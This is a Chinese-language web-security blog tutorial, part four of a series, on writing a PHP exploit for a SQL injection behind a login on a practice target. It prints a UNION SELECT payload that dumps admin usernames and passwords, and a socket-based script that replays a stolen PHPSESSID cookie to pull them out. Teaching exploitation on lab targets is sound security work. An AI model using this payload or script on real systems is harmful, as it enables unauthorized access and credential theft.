?

Sep 27 2018

WEB安全第七章exp編寫四

首頁 » 原創作品 » WEB安全第七章exp編寫四   

WEB安全第七章exp編寫四 存在權限限制exp編寫

前三篇exp編寫,相信大家對exp編寫已經有了一定的認識,已經具備了一定的exp編寫能力了。

不理解 或者不懂 最好把前三篇再學習,再來學習這篇,前三篇都是直接使用payload 訪問攻擊頁面,而且不需要權限認證,能直接使用exp。

如果遇上需要登錄后才能訪問漏洞頁面,這是該怎么辦?

訪問暗月靶機系統


帳號和密碼分別是:moon 123456

登錄訪問->成功后->文章列表


11.jpg


12.jpg


id=1 是存在SQL注入的,以下是測試的payload語句。


-1 union select 1,2,group_concat(0x7e,username,0x3a,password,0x7e) from admin




如果不登錄的情況下直接訪問url 頁面是會返回 登錄后再進行訪問 這種情況下編寫exp同樣是返回 登錄后再進行訪問


13.jpg



http://target_sys.com/article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin


14.jpg


這種頁面如何處理?


1、首先要理解 用戶登錄驗證是通過 SESSION_ID 做判斷的,無論是那種網頁程序 asp aspx php java都是一樣的。
暗月靶機系統為列 ,訪問網頁的時候 系統會分配一個唯一的SEESION_ID給你的瀏覽器,主要是表現在http頭信息,沒特別的設置的時候,關閉瀏覽器這個文件頭信息就會消失。

15.jpg


2、用戶登錄成功后會在SESSION里生成判斷的key 通過這個key驗證是否登錄。
登錄成功后系統就會王 060ntcbj0ntqnahf125qkc3s41這個文件里面寫入內容,具體看這個部分的代碼

16.jpg


$_SESSION['name']=$usernme;

登錄成功后查看文件 Cookie:PHPSESSID=060ntcbj0ntqnahf125qkc3s41 里就會存在moon


17.jpg




exp代碼



<?php
$site="target_sys.com";
$payload="article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin";
$key ="PHPSESSID=060ntcbj0ntqnahf125qkc3s41";


function send_http($site,$payload,$key){
        $fp = fsockopen($site, 80, $errno, $errstr, 30);
        if (!$fp) {
                echo "$errstr ($errno)<br />\n";
        } else {
                $out = "GET /{$payload} HTTP/1.1\r\n";
                $out .= "Host:{$site} \r\n";
                $out .= "Connection: keep-alive\r\n\r\n";
                $out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
                $out .="Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\n";
                $out .="Cookie:{$key}\r\n";
                fwrite($fp, $out);
                while (!feof($fp)) {
                        $resp .=  fgets($fp, 1024);
                }
                fclose($fp);
                return $resp;
        }
        
        
}


$html = send_http($site,$payload,$key);

if($html){
        preg_match('/~(.*?)~/', $html,$m);
        if($m[1]){
                echo "[+]{$m[1]}[+]";
        }else{
                echo "[!]error[!]";
        }
        
}else{
                echo "[!]error[!]";
        }

?>




下載exp  exp3.rar


直接運行如圖


18.jpg

如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽: exp編寫

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «WEB安全第七章exp編寫五 | WEB安全第七章exp編寫三»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖